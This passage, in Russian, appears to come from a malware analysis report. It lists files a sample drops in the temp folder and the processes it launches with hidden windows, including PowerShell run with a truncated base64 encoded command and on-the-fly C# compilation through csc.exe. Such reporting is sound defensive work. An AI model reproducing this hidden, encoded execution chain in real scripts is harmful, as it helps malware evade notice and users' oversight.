Техническая информация
- %TEMP%\content\4540-3444-wscript.exe-15-52-01-942.dump
- %TEMP%\rppin0th\rppin0th.0.cs
- %TEMP%\rppin0th\rppin0th.cmdline
- %TEMP%\rppin0th\rppin0th.out
- %TEMP%\rppin0th\csc8149af3d23af4e2c8430986fb666442.tmp
- %TEMP%\resc688.tmp
- %TEMP%\rppin0th\rppin0th.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBQAHIAZQBmAG8AcgBtACAAcwB1AHAAZQByAGwAYQB0AGkAIABNAG8AcgBnAGQAYQBnACAAUgBlAGYAZQByAGUAbgAgAEgAdgBlAHAAcwBlAHQAYQBsAGoAIABIAGkAZwBoACAATQBhAHQAdABlAHIAZgAgAEQAaQBnAGEAIABLAG8A...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\rppin0th\rppin0th.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC688.tmp" "%TEMP%\rppin0th\CSC8149AF3D23AF4E2C8430986FB666442.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBQAHIAZQBmAG8AcgBtACAAcwB1AHAAZQByAGwAYQB0AGkAIABNAG8AcgBnAGQAYQBnACAAUgBlAGYAZQByAGUAbgAgAEgAdgBlAHAAcwBlAHQAYQBsAGoAIABIAGkAZwBoACAATQBhAHQAdABlAHIAZgAgAEQAaQBnAGEAIABLAG8A...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\rppin0th\rppin0th.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC688.tmp" "%TEMP%\rppin0th\CSC8149AF3D23AF4E2C8430986FB666442.TMP"